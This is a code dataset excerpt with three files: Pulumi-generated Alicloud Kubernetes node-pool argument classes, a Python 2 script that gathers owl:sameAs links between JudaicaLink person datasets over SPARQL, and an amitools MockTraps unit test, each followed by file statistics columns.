private_ip: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] id: ID of the node.
:param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
:param pulumi.Input[str] private_ip: The private IP address of node.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if name is not None:
pulumi.set(__self__, "name", name)
if private_ip is not None:
pulumi.set(__self__, "private_ip", private_ip)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the node.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The kubernetes cluster's name. It is unique in one Alicloud account.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="privateIp")
def private_ip(self) -> Optional[pulumi.Input[str]]:
"""
The private IP address of node.
"""
return pulumi.get(self, "private_ip")
@private_ip.setter
def private_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ip", value)
@pulumi.input_type
class NodePoolDataDiskArgs:
def __init__(__self__, *,
auto_snapshot_policy_id: Optional[pulumi.Input[str]] = None,
category: Optional[pulumi.Input[str]] = None,
device: Optional[pulumi.Input[str]] = None,
encrypted: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
performance_level: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
snapshot_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] category: The type of the data disks. Valid values:`cloud`, `cloud_efficiency`, `cloud_ssd` and `cloud_essd`.
:param pulumi.Input[str] encrypted: Specifies whether to encrypt data disks. Valid values: true and false. Default to `false`.
:param pulumi.Input[str] name: The name of node pool.
:param pulumi.Input[str] performance_level: Worker node data disk performance level, when `category` values `cloud_essd`, the optional values are `PL0`, `PL1`, `PL2` or `PL3`, but the specific performance level is related to the disk capacity. For more information, see [Enhanced SSDs](https://www.alibabacloud.com/help/doc-detail/122389.htm). Default is `PL1`.
:param pulumi.Input[int] size: The size of a data disk, Its valid value range [40~32768] in GB. Default to `40`.
"""
if auto_snapshot_policy_id is not None:
pulumi.set(__self__, "auto_snapshot_policy_id", auto_snapshot_policy_id)
if category is not None:
pulumi.set(__self__, "category", category)
if device is not None:
pulumi.set(__self__, "device", device)
if encrypted is not None:
pulumi.set(__self__, "encrypted", encrypted)
if kms_key_id is not None:
pulumi.set(__self__, "kms_key_id", kms_key_id)
if name is not None:
pulumi.set(__self__, "name", name)
if performance_level is not None:
pulumi.set(__self__, "performance_level", performance_level)
if size is not None:
pulumi.set(__self__, "size", size)
if snapshot_id is not None:
pulumi.set(__self__, "snapshot_id", snapshot_id)
@property
@pulumi.getter(name="autoSnapshotPolicyId")
def auto_snapshot_policy_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "auto_snapshot_policy_id")
@auto_snapshot_policy_id.setter
def auto_snapshot_policy_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "auto_snapshot_policy_id", value)
@property
@pulumi.getter
def category(self) -> Optional[pulumi.Input[str]]:
"""
The type of the data disks. Valid values:`cloud`, `cloud_efficiency`, `cloud_ssd` and `cloud_essd`.
"""
return pulumi.get(self, "category")
@category.setter
def category(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "category", value)
@property
@pulumi.getter
def device(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "device")
@device.setter
def device(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "device", value)
@property
@pulumi.getter
def encrypted(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether to encrypt data disks. Valid values: true and false. Default to `false`.
"""
return pulumi.get(self, "encrypted")
@encrypted.setter
def encrypted(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "encrypted", value)
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "kms_key_id")
@kms_key_id.setter
def kms_key_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of node pool.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="performanceLevel")
def performance_level(self) -> Optional[pulumi.Input[str]]:
"""
Worker node data disk performance level, when `category` values `cloud_essd`, the optional values are `PL0`, `PL1`, `PL2` or `PL3`, but the specific performance level is related to the disk capacity. For more information, see [Enhanced SSDs](https://www.alibabacloud.com/help/doc-detail/122389.htm). Default is `PL1`.
"""
return pulumi.get(self, "performance_level")
@performance_level.setter
def performance_level(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "performance_level", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[int]]:
"""
The size of a data disk, Its valid value range [40~32768] in GB. Default to `40`.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter(name="snapshotId")
def snapshot_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "snapshot_id")
@snapshot_id.setter
def snapshot_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "snapshot_id", value)
@pulumi.input_type
class NodePoolLabelArgs:
def __init__(__self__, *,
key: pulumi.Input[str],
value: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] key: The label key.
:param pulumi.Input[str] value: The label value.
"""
pulumi.set(__self__, "key", key)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
The label key.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
"""
The label value.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
@pulumi.input_type
class NodePoolManagementArgs:
def __init__(__self__, *,
max_unavailable: pulumi.Input[int],
auto_repair: Optional[pulumi.Input[bool]] = None,
auto_upgrade: Optional[pulumi.Input[bool]] = None,
surge: Optional[pulumi.Input[int]] = None,
surge_percentage: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] max_unavailable: Max number of unavailable nodes. Default to `1`.
:param pulumi.Input[bool] auto_repair: Whether automatic repair, Default to `false`.
:param pulumi.Input[bool] auto_upgrade: Whether auto upgrade, Default to `false`.
:param pulumi.Input[int] surge: Number of additional nodes. You have to specify one of surge, surge_percentage.
:param pulumi.Input[int] surge_percentage: Proportion of additional nodes. You have to specify one of surge, surge_percentage.
"""
pulumi.set(__self__, "max_unavailable", max_unavailable)
if auto_repair is not None:
pulumi.set(__self__, "auto_repair", auto_repair)
if auto_upgrade is not None:
pulumi.set(__self__, "auto_upgrade", auto_upgrade)
if surge is not None:
pulumi.set(__self__, "surge", surge)
if surge_percentage is not None:
pulumi.set(__self__, "surge_percentage", surge_percentage)
@property
@pulumi.getter(name="maxUnavailable")
def max_unavailable(self) -> pulumi.Input[int]:
"""
Max number of unavailable nodes. Default to `1`.
"""
return pulumi.get(self, "max_unavailable")
@max_unavailable.setter
def max_unavailable(self, value: pulumi.Input[int]):
pulumi.set(self, "max_unavailable", value)
@property
@pulumi.getter(name="autoRepair")
def auto_repair(self) -> Optional[pulumi.Input[bool]]:
"""
Whether automatic repair, Default to `false`.
"""
return pulumi.get(self, "auto_repair")
@auto_repair.setter
def auto_repair(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_repair", value)
@property
@pulumi.getter(name="autoUpgrade")
def auto_upgrade(self) -> Optional[pulumi.Input[bool]]:
"""
Whether auto upgrade, Default to `false`.
"""
return pulumi.get(self, "auto_upgrade")
@auto_upgrade.setter
def auto_upgrade(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_upgrade", value)
@property
@pulumi.getter
def surge(self) -> Optional[pulumi.Input[int]]:
"""
Number of additional nodes. You have to specify one of surge, surge_percentage.
"""
return pulumi.get(self, "surge")
@surge.setter
def surge(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "surge", value)
@property
@pulumi.getter(name="surgePercentage")
def surge_percentage(self) -> Optional[pulumi.Input[int]]:
"""
Proportion of additional nodes. You have to specify one of surge, surge_percentage.
"""
return pulumi.get(self, "surge_percentage")
@surge_percentage.setter
def surge_percentage(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "surge_percentage", value)
@pulumi.input_type
class NodePoolScalingConfigArgs:
def __init__(__self__, *,
max_size: pulumi.Input[int],
min_size: pulumi.Input[int],
eip_bandwidth: Optional[pulumi.Input[int]] = None,
eip_internet_charge_type: Optional[pulumi.Input[str]] = None,
is_bond_eip: Optional[pulumi.Input[bool]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[int] max_size: Max number of instances in a auto scaling group, its valid value range [0~1000]. `max_size` has to be greater than `min_size`.
:param pulumi.Input[int] min_size: Min number of instances in a auto scaling group, its valid value range [0~1000].
:param pulumi.Input[int] eip_bandwidth: Peak EIP bandwidth. Its valid value range [1~500] in Mbps. Default to `5`.
:param pulumi.Input[str] eip_internet_charge_type: EIP billing type. `PayByBandwidth`: Charged at fixed bandwidth. `PayByTraffic`: Billed as used traffic. Default: `PayByBandwidth`. Conflict with `internet_charge_type`, EIP and public network IP can only choose one.
:param pulumi.Input[bool] is_bond_eip: Whether to bind EIP for an instance. Default: `false`.
:param pulumi.Input[str] type: Instance classification, not required. Vaild value: `cpu`, `gpu`, `gpushare` and `spot`. Default: `cpu`. The actual instance type is determined by `instance_types`.
"""
pulumi.set(__self__, "max_size", max_size)
pulumi.set(__self__, "min_size", min_size)
if eip_bandwidth is not None:
pulumi.set(__self__, "eip_bandwidth", eip_bandwidth)
if eip_internet_charge_type is not None:
pulumi.set(__self__, "eip_internet_charge_type", eip_internet_charge_type)
if is_bond_eip is not None:
pulumi.set(__self__, "is_bond_eip", is_bond_eip)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="maxSize")
def max_size(self) -> pulumi.Input[int]:
"""
Max number of instances in a auto scaling group, its valid value range [0~1000]. `max_size` has to be greater than `min_size`.
"""
return pulumi.get(self, "max_size")
@max_size.setter
def max_size(self, value: pulumi.Input[int]):
pulumi.set(self, "max_size", value)
@property
@pulumi.getter(name="minSize")
def min_size(self) -> pulumi.Input[int]:
"""
Min number of instances in a auto scaling group, its valid value range [0~1000].
"""
return pulumi.get(self, "min_size")
@min_size.setter
def min_size(self, value: pulumi.Input[int]):
pulumi.set(self, "min_size", value)
@property
@pulumi.getter(name="eipBandwidth")
def eip_bandwidth(self) -> Optional[pulumi.Input[int]]:
"""
Peak EIP bandwidth. Its valid value range [1~500] in Mbps. Default to `5`.
"""
return pulumi.get(self, "eip_bandwidth")
@eip_bandwidth.setter
def eip_bandwidth(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "eip_bandwidth", value)
@property
@pulumi.getter(name="eipInternetChargeType")
def eip_internet_charge_type(self) -> Optional[pulumi.Input[str]]:
"""
EIP billing type. `PayByBandwidth`: Charged at fixed bandwidth. `PayByTraffic`: Billed as used traffic. Default: `PayByBandwidth`. Conflict with `internet_charge_type`, EIP and public network IP can only choose one.
"""
return pulumi.get(self, "eip_internet_charge_type")
@eip_internet_charge_type.setter
def eip_internet_charge_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "eip_internet_charge_type", value)
@property
@pulumi.getter(name="isBondEip")
def is_bond_eip(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to bind EIP for an instance. Default: `false`.
"""
return pulumi.get(self, "is_bond_eip")
@is_bond_eip.setter
def is_bond_eip(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_bond_eip", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
Instance classification, not required. Vaild value: `cpu`, `gpu`, `gpushare` and `spot`. Default: `cpu`. The actual instance type is determined by `instance_types`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class NodePoolSpotPriceLimitArgs:
def __init__(__self__, *,
instance_type: Optional[pulumi.Input[str]] = None,
price_limit: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] instance_type: Spot instance type.
:param pulumi.Input[str] price_limit: The maximum hourly price of the spot instance.
"""
if instance_type is not None:
pulumi.set(__self__, "instance_type", instance_type)
if price_limit is not None:
pulumi.set(__self__, "price_limit", price_limit)
@property
@pulumi.getter(name="instanceType")
def instance_type(self) -> Optional[pulumi.Input[str]]:
"""
Spot instance type.
"""
return pulumi.get(self, "instance_type")
@instance_type.setter
def instance_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "instance_type", value)
@property
@pulumi.getter(name="priceLimit")
def price_limit(self) -> Optional[pulumi.Input[str]]:
"""
The maximum hourly price of the spot instance.
"""
return pulumi.get(self, "price_limit")
@price_limit.setter
def price_limit(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "price_limit", value)
@pulumi.input_type
class NodePoolTaintArgs:
def __init__(__self__, *,
key: pulumi.Input[str],
effect: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] key: The label key.
:param pulumi.Input[str] value: The label value.
"""
pulumi.set(__self__, "key", key)
if effect is not None:
pulumi.set(__self__, "effect", effect)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
The label key.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def effect(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "effect")
@effect.setter
def effect(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "effect", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
"""
The label value.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
@pulumi.input_type
class ServerlessKubernetesAddonArgs:
def __init__(__self__, *,
config: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] config: The ACK add-on configurations.
:param pulumi.Input[bool] disabled: Disables the automatic installation of a component. Default is `false`.
:param pulumi.Input[str] name: Name of the ACK add-on. The name must match one of the names returned by [DescribeAddons](https://help.aliyun.com/document_detail/171524.html).
"""
if config is not None:
pulumi.set(__self__, "config", config)
if disabled is not None:
pulumi.set(__self__, "disabled", disabled)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def config(self) -> Optional[pulumi.Input[str]]:
"""
The ACK add-on configurations.
"""
return pulumi.get(self, "config")
@config.setter
def config(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "config", value)
@property
@pulumi.getter
def disabled(self) -> Optional[pulumi.Input[bool]]:
"""
Disables the automatic installation of a component. Default is `false`.
"""
return pulumi.get(self, "disabled")
@disabled.setter
def disabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disabled", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the ACK add-on. The name must match one of the names returned by [DescribeAddons](https://help.aliyun.com/document_detail/171524.html).
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class SwarmNodeArgs:
def __init__(__self__, *,
eip: Optional[pulumi.Input[str]] = None,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
private_ip: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None):
if eip is not None:
pulumi.set(__self__, "eip", eip)
if id is not None:
pulumi.set(__self__, "id", id)
if name is not None:
pulumi.set(__self__, "name", name)
if private_ip is not None:
pulumi.set(__self__, "private_ip", private_ip)
if status is not None:
pulumi.set(__self__, "status", status)
@property
@pulumi.getter
def eip(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "eip")
@eip.setter
def eip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "eip", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="privateIp")
def private_ip(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "private_ip")
@private_ip.setter
def private_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ip", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@pulumi.input_type
class GetKubernetesPermissionPermissionArgs:
def __init__(__self__, *,
resource_id: str,
resource_type: str,
role_name: str,
is_owner: Optional[bool] = None,
is_ram_role: Optional[bool] = None,
role_type: Optional[str] = None):
"""
:param str resource_id: The permission settings to manage ACK clusters.
:param str resource_type: The authorization type. Valid values `cluster`, `namespace` and `console`.
:param str role_name: The name of the predefined role. If a custom role is assigned, the value is the name of the assigined custom role.
:param bool is_owner: ndicates whether the permissions are granted to the cluster owner. Valid values `0`, `1`.
* `is_ram_role` -Indicates whether the permissions are granted to the RAM role. Valid values `0`,`1`.
:param str role_type: The predefined role. Valid values `admin`,`ops`,`dev`,`restricted` and `custom`.
"""
pulumi.set(__self__, "resource_id", resource_id)
pulumi.set(__self__, "resource_type", resource_type)
pulumi.set(__self__, "role_name", role_name)
if is_owner is not None:
pulumi.set(__self__, "is_owner", is_owner)
if is_ram_role is not None:
pulumi.set(__self__, "is_ram_role", is_ram_role)
if role_type is not None:
pulumi.set(__self__, "role_type", role_type)
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> str:
"""
The permission settings to manage ACK clusters.
"""
return pulumi.get(self, "resource_id")
@resource_id.setter
def resource_id(self, value: str):
pulumi.set(self, "resource_id", value)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> str:
"""
The authorization type. Valid values `cluster`, `namespace` and `console`.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: str):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="roleName")
def role_name(self) -> str:
"""
The name of the predefined role. If a custom role is assigned, the value is the name of the assigined custom role.
"""
return pulumi.get(self, "role_name")
@role_name.setter
def role_name(self, value: str):
pulumi.set(self, "role_name", value)
@property
@pulumi.getter(name="isOwner")
def is_owner(self) -> Optional[bool]:
"""
ndicates whether the permissions are granted to the cluster owner. Valid values `0`, `1`.
* `is_ram_role` -Indicates whether the permissions are granted to the RAM role. Valid values `0`,`1`.
"""
return pulumi.get(self, "is_owner")
@is_owner.setter
def is_owner(self, value: Optional[bool]):
pulumi.set(self, "is_owner", value)
@property
@pulumi.getter(name="isRamRole")
def is_ram_role(self) -> Optional[bool]:
return pulumi.get(self, "is_ram_role")
@is_ram_role.setter
def is_ram_role(self, value: Optional[bool]):
pulumi.set(self, "is_ram_role", value)
@property
@pulumi.getter(name="roleType")
def role_type(self) -> Optional[str]:
"""
The predefined role. Valid values `admin`,`ops`,`dev`,`restricted` and `custom`.
"""
return pulumi.get(self, "role_type")
@role_type.setter
def role_type(self, value: Optional[str]):
pulumi.set(self, "role_type", value)
| 37.546453
| 369
| 0.634957
| 10,939
| 88,910
| 4.992047
| 0.036018
| 0.108372
| 0.112291
| 0.135365
| 0.916679
| 0.869818
| 0.852348
| 0.837625
| 0.8253
| 0.806805
| 0
| 0.00317
| 0.244247
| 88,910
| 2,367
| 370
| 37.562315
| 0.809522
| 0.223676
| 0
| 0.800127
| 1
| 0
| 0.084771
| 0.018056
| 0
| 0
| 0
| 0
| 0
| 1
| 0.205602
| false
| 0
| 0.003183
| 0.031827
| 0.322724
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
73b8a65698ca533e97614e589e1fff5364310344
| 5,039
|
py
|
Python
|
interlinks/scripts/JudaicaLink-interlink-02.py
|
judaicalink/judaicalink-generators
|
845dbd6886fa82ec45adf16ba08fad9d26169419
|
[
"MIT"
] | 1
|
2020-09-20T17:00:05.000Z
|
2020-09-20T17:00:05.000Z
|
interlinks/scripts/JudaicaLink-interlink-02.py
|
wisslab/judaicalink-generators
|
845dbd6886fa82ec45adf16ba08fad9d26169419
|
[
"MIT"
] | null | null | null |
interlinks/scripts/JudaicaLink-interlink-02.py
|
wisslab/judaicalink-generators
|
845dbd6886fa82ec45adf16ba08fad9d26169419
|
[
"MIT"
] | null | null | null |
#Maral Dadvar
#02/10/2017
#This scripts look sfor sameAs lines between bhr and JudaicaLink
import unicodedata
import os , glob
import rdflib
from rdflib import Namespace, URIRef, Graph , Literal , OWL, RDFS , RDF
from SPARQLWrapper import SPARQLWrapper2, XML , JSON , TURTLE
import re
import pprint
os.chdir('C:\Users\Maral\Desktop')
sparql = SPARQLWrapper2("http://localhost:3030/Datasets/sparql")
foaf = Namespace("http://xmlns.com/foaf/0.1/")
rdf = Namespace("http://www.w3.org/1999/02/22-rdf-syntax-ns#")
jl = Namespace("http://data.judaicalink.org/ontology/")
skos = Namespace("http://www.w3.org/2004/02/skos/core#")
owl = Namespace("http://www.w3.org/2002/07/owl#")
g = Graph()
g.bind('foaf',foaf)
g.bind('jl',jl)
g.bind('skos',skos)
g.bind('owl',owl)
spar1= """
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
PREFIX gndo: <http://d-nb.info/standards/elementset/gnd#>
PREFIX pro: <http://purl.org/hpi/patchr#>
PREFIX owl: <http://www.w3.org/2002/07/owl#>
PREFIX edm: <http://www.europeana.eu/schemas/edm/>
PREFIX dc: <http://purl.org/dc/elements/1.1/>
PREFIX foaf: <http://xmlns.com/foaf/0.1/>
PREFIX skos: <http://www.w3.org/2004/02/skos/core#>
PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX dblp: <http://dblp.org/rdf/schema-2015-01-26#>
PREFIX dcterms: <http://purl.org/dc/terms/>
PREFIX dbpedia: <http://dbpedia.org/resource/>
PREFIX jl: <http://data.judaicalink.org/ontology/>
PREFIX gnd: <http://d-nb.info/gnd/>
Select ?x ?sameas
From <http://maral.wisslab.org/graphs/yivo>
From <http://maral.wisslab.org/graphs/bhr>
From <http://maral.wisslab.org/graphs/rujen>
From <http://maral.wisslab.org/graphs/djh>
From <http://maral.wisslab.org/graphs/gnd_persons>
From <http://maral.wisslab.org/graphs/freimann-gnd>
where{
?x a foaf:Person.
?x owl:sameAs ?sameas.
}
"""
sparql.setQuery(spar1)
sparql.setReturnFormat(TURTLE)
results = sparql.query().convert()
if (u"x",u"sameas") in results:
bindings = results[u"x",u"sameas"]
for b in bindings:
print b
if 'http://data.judaicalink.org/data/bhr' in b[u"sameas"].value:
g.add( (URIRef(b[u"x"].value), owl.sameAs , URIRef(b[u"sameas"].value) ) )
if 'http://data.judaicalink.org/data/yivo' in b[u"sameas"].value:
g.add( (URIRef(b[u"x"].value), owl.sameAs , URIRef(b[u"sameas"].value) ) )
if 'http://data.judaicalink.org/data/djh' in b[u"sameas"].value:
g.add( (URIRef(b[u"x"].value), owl.sameAs , URIRef(b[u"sameas"].value) ) )
if 'http://data.judaicalink.org/data/rujen' in b[u"sameas"].value:
g.add( (URIRef(b[u"x"].value), owl.sameAs , URIRef(b[u"sameas"].value) ) )
if 'http://data.judaicalink.org/data/gnd' in b[u"sameas"].value:
g.add( (URIRef(b[u"x"].value), owl.sameAs , URIRef(b[u"sameas"].value) ) )
if 'http://data.judaicalink.org/data/dbpedia' in b[u"sameas"].value:
g.add( (URIRef(b[u"x"].value), owl.sameAs , URIRef(b[u"sameas"].value) ) )
spar2= """
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
PREFIX gndo: <http://d-nb.info/standards/elementset/gnd#>
PREFIX pro: <http://purl.org/hpi/patchr#>
PREFIX owl: <http://www.w3.org/2002/07/owl#>
PREFIX edm: <http://www.europeana.eu/schemas/edm/>
PREFIX dc: <http://purl.org/dc/elements/1.1/>
PREFIX foaf: <http://xmlns.com/foaf/0.1/>
PREFIX skos: <http://www.w3.org/2004/02/skos/core#>
PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX dblp: <http://dblp.org/rdf/schema-2015-01-26#>
PREFIX dcterms: <http://purl.org/dc/terms/>
PREFIX dbpedia: <http://dbpedia.org/resource/>
PREFIX jl: <http://data.judaicalink.org/ontology/>
PREFIX gnd: <http://d-nb.info/gnd/>
Select ?x ?sameas
where{
graph <http://maral.wisslab.org/graphs/dbpedia_persons> {
?x a foaf:Person.
?x owl:sameAs ?sameas.
}}
"""
sparql.setQuery(spar2)
sparql.setReturnFormat(TURTLE)
results = sparql.query().convert()
if (u"x",u"sameas") in results:
bindings = results[u"x",u"sameas"]
for b in bindings:
print b
if 'http://data.judaicalink.org/data/bhr' in b[u"sameas"].value:
g.add( (URIRef(b[u"x"].value), owl.sameAs , URIRef(b[u"sameas"].value) ) )
if 'http://data.judaicalink.org/data/yivo' in b[u"sameas"].value:
g.add( (URIRef(b[u"x"].value), owl.sameAs , URIRef(b[u"sameas"].value) ) )
if 'http://data.judaicalink.org/data/djh' in b[u"sameas"].value:
g.add( (URIRef(b[u"x"].value), owl.sameAs , URIRef(b[u"sameas"].value) ) )
if 'http://data.judaicalink.org/data/rujen' in b[u"sameas"].value:
g.add( (URIRef(b[u"x"].value), owl.sameAs , URIRef(b[u"sameas"].value) ) )
if 'http://data.judaicalink.org/data/gnd' in b[u"sameas"].value:
g.add( (URIRef(b[u"x"].value), owl.sameAs , URIRef(b[u"sameas"].value) ) )
g.serialize(destination = 'interlinks-03.ttl' , format="turtle")
| 32.301282
| 86
| 0.635444
| 788
| 5,039
| 4.060914
| 0.162437
| 0.020625
| 0.055
| 0.089375
| 0.831875
| 0.805938
| 0.745938
| 0.739375
| 0.73125
| 0.73125
| 0
| 0.030439
| 0.15896
| 5,039
| 155
| 87
| 32.509677
| 0.724634
| 0.016868
| 0
| 0.67619
| 0
| 0.019048
| 0.575096
| 0.004447
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.066667
| null | null | 0.028571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73c53775643d971d6d73ad15e29e1b86526f4469
| 986
|
py
|
Python
|
FictionTools/amitools/test/unit/machine_mocktraps.py
|
polluks/Puddle-BuildTools
|
c1762d53a33002b62d8cffe3db129505a387bec3
|
[
"BSD-2-Clause"
] | 38
|
2021-06-18T12:56:15.000Z
|
2022-03-12T20:38:40.000Z
|
FictionTools/amitools/test/unit/machine_mocktraps.py
|
polluks/Puddle-BuildTools
|
c1762d53a33002b62d8cffe3db129505a387bec3
|
[
"BSD-2-Clause"
] | 2
|
2021-06-20T16:28:12.000Z
|
2021-11-17T21:33:56.000Z
|
FictionTools/amitools/test/unit/machine_mocktraps.py
|
polluks/Puddle-BuildTools
|
c1762d53a33002b62d8cffe3db129505a387bec3
|
[
"BSD-2-Clause"
] | 6
|
2021-06-18T18:18:36.000Z
|
2021-12-22T08:01:32.000Z
|
from amitools.vamos.machine import MockTraps
def mock_traps_base_test():
t = MockTraps()
a = []
def my_func(op, pc):
assert op == 0xA000
assert pc == 0x42
a.append("huhu")
assert t.get_num_traps() == 0
tid = t.setup(my_func)
assert t.get_num_traps() == 1
assert t.get_func(tid) == my_func
assert not t.is_auto_rts(tid)
assert not t.is_one_shot(tid)
t.trigger(tid, pc=0x42)
assert a == ["huhu"]
t.free(tid)
assert t.get_num_traps() == 0
def mock_traps_one_shot_test():
t = MockTraps()
a = []
def my_func(op, pc):
assert op == 0xA000
assert pc == 0x42
a.append("huhu")
assert t.get_num_traps() == 0
tid = t.setup(my_func, one_shot=True)
assert t.get_num_traps() == 1
assert t.get_func(tid) == my_func
assert not t.is_auto_rts(tid)
assert t.is_one_shot(tid)
t.trigger(tid, pc=0x42)
assert a == ["huhu"]
assert t.get_num_traps() == 0
| 22.930233
| 44
| 0.598377
| 160
| 986
| 3.4625
| 0.23125
| 0.113718
| 0.144404
| 0.140794
| 0.826715
| 0.826715
| 0.792419
| 0.758123
| 0.758123
| 0.758123
| 0
| 0.035961
| 0.266734
| 986
| 42
| 45
| 23.47619
| 0.73029
| 0
| 0
| 0.764706
| 0
| 0
| 0.016227
| 0
| 0
| 0
| 0.028398
| 0
| 0.529412
| 1
| 0.117647
| false
| 0
| 0.029412
| 0
| 0.147059
| 0
| 0
| 0
| 0
| null | 0
